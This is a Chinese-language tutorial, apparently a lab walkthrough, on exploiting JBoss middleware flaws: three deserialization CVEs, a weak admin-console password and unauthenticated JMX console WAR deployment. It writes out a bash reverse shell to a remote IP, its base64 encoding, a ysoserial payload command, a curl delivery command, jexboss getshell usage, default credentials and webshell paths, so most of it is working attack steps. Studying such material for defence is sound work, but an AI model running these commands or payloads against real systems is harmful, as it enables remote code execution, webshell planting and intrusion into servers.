常见中间件漏洞攻略-Jboss篇

一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞

第一步:开启靶场
第二步:访问该接口,发现直接下载,说明接⼝开放,此接⼝存在反序列化漏洞
复制代码
http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:准备ysoserial⼯具进⾏漏洞利⽤,将反弹shell进⾏base64编码
复制代码
#反弹shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1

#64base编码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx

#命令使用工具生成恶意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服务器开启监听,终端执行命令,成功反弹shell
复制代码
#执行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞

第一步:开启靶场
第二步:访问漏洞靶场
复制代码
#漏洞靶场
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:准备jexboss工具包,geshell
复制代码
#运行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080

三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞

第一步:开启靶场
第二步:验证是否存在漏洞
复制代码
#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly

#响应码500 --- 服务器内部错误,无法完成请求 --- 说明⻚⾯存在,此⻚⾯存在反序列化漏洞
#服务器将⽤户post请求内容进⾏反序列化
第三步:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell

四、Administration Console弱⼝令

第一步:登陆后台
复制代码
#后台地址
http://47.103.81.25:8080/admin-console/login.seam

#用户名密码
admin:vulhub
第二步:点击web应用,上传后门文件shell.war
第三步:连接webshell
复制代码
#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp

五、低版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/

#用户名密码
admin:amdin
第二步:准备通过URL的⽅式远程部署war包
第三步:将后门文件war包上传至云服务器,并测试能否顺利访问到
第四步:填写war包地址,点击invoke跳转
第五步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/shell/shell.jsp	w

六、高版本JMX Console未授权

第一步:开启靶场
复制代码
#URL
http://47.103.81.25:8080/jmx-console/
第二步:准备通过URL的⽅式远程部署war包cmd.war
第三步:连接webshell
复制代码
#URL
http://47.103.81.25:8080/cmd/shell.jsp

FROM IYU_

相关推荐
用户962377954482 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机2 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954482 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star2 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954482 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher4 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行7 天前
网络安全总结
安全·web安全
red1giant_star7 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透7 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全